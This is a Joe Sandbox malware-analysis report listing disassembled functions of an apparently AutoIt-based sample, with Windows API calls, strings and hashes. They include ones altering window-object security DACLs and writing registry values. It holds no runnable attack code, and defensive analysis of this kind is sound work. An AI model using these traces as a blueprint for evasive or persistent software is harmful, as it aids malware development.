                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                        • String ID:
                                        • API String ID: 4124339563-0
                                        • Opcode ID: 8a686dd3d71ba86a2674afb4cee84a5adc6eb94035547783d2255cdf59b7ff4d
                                        • Instruction ID: 333c224bf820190f4c7444a15bc1498728d982810d369a1f6528981beed64b91
                                        • Opcode Fuzzy Hash: 8a686dd3d71ba86a2674afb4cee84a5adc6eb94035547783d2255cdf59b7ff4d
                                        • Instruction Fuzzy Hash: 02A18172008301EFDB10AF64DC88B5F7BA9FB49324F200B19F962961E1E775E944DB65
                                        Function 00C08D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00C08E14
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C46AC5
                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C46AFE
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C46F43
                                          • Part of subcall function 00C08F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C08BE8,?,00000000,?,?,?,?,00C08BBA,00000000,?), ref: 00C08FC5
                                        • SendMessageW.USER32(?,00001053), ref: 00C46F7F
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C46F96
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C46FAC
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C46FB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                        • String ID: 0
                                        • API String ID: 2760611726-4108050209
                                        • Opcode ID: 43c8ee6d94896935c709d10727ee2485124ccce7b7b8d160d7526236495c801b
                                        • Instruction ID: f514f92359aaf8fa141dc32bd9e5c03cc100cebb2188aa9b9d0d1beee47694ea
                                        • Opcode Fuzzy Hash: 43c8ee6d94896935c709d10727ee2485124ccce7b7b8d160d7526236495c801b
                                        • Instruction Fuzzy Hash: EF12DD34600201DFDB25CF24C884BAABBE5FB46710F188469F5A5CB2A6CB31ED55DB92
                                        Function 00C72711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 00C7273E
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C7286A
                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C728A9
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C728B9
                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C72900
                                        • GetClientRect.USER32(00000000,?), ref: 00C7290C
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C72955
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C72964
                                        • GetStockObject.GDI32(00000011), ref: 00C72974
                                        • SelectObject.GDI32(00000000,00000000), ref: 00C72978
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C72988
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C72991
                                        • DeleteDC.GDI32(00000000), ref: 00C7299A
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C729C6
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C729DD
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C72A1D
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C72A31
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C72A42
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C72A77
                                        • GetStockObject.GDI32(00000011), ref: 00C72A82
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C72A8D
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C72A97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 1fac5c41d10dbf70afe5d83f1406db40967567872543af1ab3a18388fe99deb8
                                        • Instruction ID: d0b9bc6da7cde7ba4193814c677824e937a723f04a8e4b2b027af4cb98472a60
                                        • Opcode Fuzzy Hash: 1fac5c41d10dbf70afe5d83f1406db40967567872543af1ab3a18388fe99deb8
                                        • Instruction Fuzzy Hash: A2B17E71A00209AFEB14DF69CD89FAE7BB9EB08714F048154FA15E72A1D774ED40CBA4
                                        Function 00C64ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C64AED
                                        • GetDriveTypeW.KERNEL32(?,00C8CB68,?,\\.\,00C8CC08), ref: 00C64BCA
                                        • SetErrorMode.KERNEL32(00000000,00C8CB68,?,\\.\,00C8CC08), ref: 00C64D36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: 19e146a3ec71113f361b07679f9c113c9f333cc880fd5f4b30defcf691b21bd8
                                        • Instruction ID: 691cec61ee88a9d2e1a8fcc5cbf583cf566f80149302400a1b7c7e07e0ad13fc
                                        • Opcode Fuzzy Hash: 19e146a3ec71113f361b07679f9c113c9f333cc880fd5f4b30defcf691b21bd8
                                        • Instruction Fuzzy Hash: 9861B07060520AEBCB28DF29CAC19BDBBA0EF44740F244465F806AB791DB39EE45DB51
                                        Function 00C873E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 00C87421
                                        • SetTextColor.GDI32(?,?), ref: 00C87425
                                        • GetSysColorBrush.USER32(0000000F), ref: 00C8743B
                                        • GetSysColor.USER32(0000000F), ref: 00C87446
                                        • CreateSolidBrush.GDI32(?), ref: 00C8744B
                                        • GetSysColor.USER32(00000011), ref: 00C87463
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C87471
                                        • SelectObject.GDI32(?,00000000), ref: 00C87482
                                        • SetBkColor.GDI32(?,00000000), ref: 00C8748B
                                        • SelectObject.GDI32(?,?), ref: 00C87498
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00C874B7
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C874CE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C874DB
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8752A
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C87554
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00C87572
                                        • DrawFocusRect.USER32(?,?), ref: 00C8757D
                                        • GetSysColor.USER32(00000011), ref: 00C8758E
                                        • SetTextColor.GDI32(?,00000000), ref: 00C87596
                                        • DrawTextW.USER32(?,00C870F5,000000FF,?,00000000), ref: 00C875A8
                                        • SelectObject.GDI32(?,?), ref: 00C875BF
                                        • DeleteObject.GDI32(?), ref: 00C875CA
                                        • SelectObject.GDI32(?,?), ref: 00C875D0
                                        • DeleteObject.GDI32(?), ref: 00C875D5
                                        • SetTextColor.GDI32(?,?), ref: 00C875DB
                                        • SetBkColor.GDI32(?,?), ref: 00C875E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: d5eb045dd39cc00d8030ce1815ac9b5d744b72a1a14ad42b1cff9f4bcef73575
                                        • Instruction ID: d9344df695afc43b3922c7191bc0ccfd2aac07c7dafbb8c3062e6d7f621118ea
                                        • Opcode Fuzzy Hash: d5eb045dd39cc00d8030ce1815ac9b5d744b72a1a14ad42b1cff9f4bcef73575
                                        • Instruction Fuzzy Hash: D2615072900218AFDF119FA4DC89FAE7F79EB08320F214215F915AB2A1D7749940DFA4
                                        Function 00C80FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00C81128
                                        • GetDesktopWindow.USER32 ref: 00C8113D
                                        • GetWindowRect.USER32(00000000), ref: 00C81144
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C81199
                                        • DestroyWindow.USER32(?), ref: 00C811B9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C811ED
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8120B
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C8121D
                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C81232
                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C81245
                                        • IsWindowVisible.USER32(00000000), ref: 00C812A1
                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C812BC
                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C812D0
                                        • GetWindowRect.USER32(00000000,?), ref: 00C812E8
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00C8130E
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00C81328
                                        • CopyRect.USER32(?,?), ref: 00C8133F
                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C813AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: c8a351867e9a93138d9d9a75bf85d89933862534889f17e32f381d518f5987c3
                                        • Instruction ID: 4b44a92e17c596aa899034c70af5dd8bc0129848722e7df117714ac77cd79be4
                                        • Opcode Fuzzy Hash: c8a351867e9a93138d9d9a75bf85d89933862534889f17e32f381d518f5987c3
                                        • Instruction Fuzzy Hash: D6B19C71608341AFD700EF64C884B6EBBE8FF84354F04895CF9999B2A1D731E949CBA5
                                        Function 00C80241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00C802E5
                                        • _wcslen.LIBCMT ref: 00C8031F
                                        • _wcslen.LIBCMT ref: 00C80389
                                        • _wcslen.LIBCMT ref: 00C803F1
                                        • _wcslen.LIBCMT ref: 00C80475
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C804C5
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C80504
                                          • Part of subcall function 00C0F9F2: _wcslen.LIBCMT ref: 00C0F9FD
                                          • Part of subcall function 00C5223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C52258
                                          • Part of subcall function 00C5223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C5228A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 1103490817-719923060
                                        • Opcode ID: 728f1676e49a929b187cea98dcaff0cc4e85c30c6642f1126c58749f63038bf7
                                        • Instruction ID: e81a643a4e1bafeeabfdbf0c7ced50310fb827edf89d84c74c04eb3efc496f7e
                                        • Opcode Fuzzy Hash: 728f1676e49a929b187cea98dcaff0cc4e85c30c6642f1126c58749f63038bf7
                                        • Instruction Fuzzy Hash: 25E1B1312082018FC754EF24C55197EB7E6BFD8318F244A6CF8A69B2A1DB30EE49CB55
                                        Function 00C08891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C08968
                                        • GetSystemMetrics.USER32(00000007), ref: 00C08970
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C0899B
                                        • GetSystemMetrics.USER32(00000008), ref: 00C089A3
                                        • GetSystemMetrics.USER32(00000004), ref: 00C089C8
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C089E5
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C089F5
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C08A28
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C08A3C
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00C08A5A
                                        • GetStockObject.GDI32(00000011), ref: 00C08A76
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C08A81
                                          • Part of subcall function 00C0912D: GetCursorPos.USER32(?), ref: 00C09141
                                          • Part of subcall function 00C0912D: ScreenToClient.USER32(00000000,?), ref: 00C0915E
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000001), ref: 00C09183
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000002), ref: 00C0919D
                                        • SetTimer.USER32(00000000,00000000,00000028,00C090FC), ref: 00C08AA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: 0b721e2f5712243f90762296eaa4fbe72f4f69eb0cafa03bc8afaeadd3bf8cce
                                        • Instruction ID: ae6d39cf91183e12c95fe4338ab8ae9a7da755d41d4ebe369e4767a7d030cce2
                                        • Opcode Fuzzy Hash: 0b721e2f5712243f90762296eaa4fbe72f4f69eb0cafa03bc8afaeadd3bf8cce
                                        • Instruction Fuzzy Hash: 96B18A71A0020A9FDF14DFA8CC85BAE3BB5FB49314F158229FA15A72D0DB34E940DB65
                                        Function 00C50D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51114
                                          • Part of subcall function 00C510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51120
                                          • Part of subcall function 00C510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C5112F
                                          • Part of subcall function 00C510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51136
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C5114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C50DF5
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C50E29
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50E40
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C50E7A
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C50E96
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50EAD
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C50EB5
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C50EBC
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C50EDD
                                        • CopySid.ADVAPI32(00000000), ref: 00C50EE4
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C50F13
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C50F35
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C50F47
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50F6E
                                        • HeapFree.KERNEL32(00000000), ref: 00C50F75
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50F7E
                                        • HeapFree.KERNEL32(00000000), ref: 00C50F85
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50F8E
                                        • HeapFree.KERNEL32(00000000), ref: 00C50F95
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C50FA1
                                        • HeapFree.KERNEL32(00000000), ref: 00C50FA8
                                          • Part of subcall function 00C51193: GetProcessHeap.KERNEL32(00000008,00C50BB1,?,00000000,?,00C50BB1,?), ref: 00C511A1
                                          • Part of subcall function 00C51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C50BB1,?), ref: 00C511A8
                                          • Part of subcall function 00C51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C50BB1,?), ref: 00C511B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: 1461d07383a71a674e78923fb88d640113a7c8d7355e2e82179d352692d06e27
                                        • Instruction ID: d9ee5ba84e977bcf5516ef1ad49d148208f2107f0a14caadb7d027edd6b670c6
                                        • Opcode Fuzzy Hash: 1461d07383a71a674e78923fb88d640113a7c8d7355e2e82179d352692d06e27
                                        • Instruction Fuzzy Hash: 6971AE7590020AABDF20DFA4DC89FAEBBB8FF05341F244215F928E6191D7719A49CB74
                                        Function 00C7C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C4BD
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C8CC08,00000000,?,00000000,?,?), ref: 00C7C544
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C7C5A4
                                        • _wcslen.LIBCMT ref: 00C7C5F4
                                        • _wcslen.LIBCMT ref: 00C7C66F
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C7C6B2
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C7C7C1
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C7C84D
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7C881
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7C88E
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C7C960
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        • Opcode ID: 775d3de84053a46cb94935e9cc86ce9ab9ab2b188c1278e4312da63cf7446486
                                        • Instruction ID: 80239c4fda680045c01c51cf38db972da0cb4d66fe6a54a0b5ccd2e8608a11c5
                                        • Opcode Fuzzy Hash: 775d3de84053a46cb94935e9cc86ce9ab9ab2b188c1278e4312da63cf7446486
                                        • Instruction Fuzzy Hash: 351268356042019FD714DF24C891B2ABBE5FF88714F04889CF99A9B3A2DB31ED45CB85
                                        Function 00C8091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00C809C6
                                        • _wcslen.LIBCMT ref: 00C80A01
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C80A54
                                        • _wcslen.LIBCMT ref: 00C80A8A
                                        • _wcslen.LIBCMT ref: 00C80B06
                                        • _wcslen.LIBCMT ref: 00C80B81
                                          • Part of subcall function 00C0F9F2: _wcslen.LIBCMT ref: 00C0F9FD
                                          • Part of subcall function 00C52BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C52BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
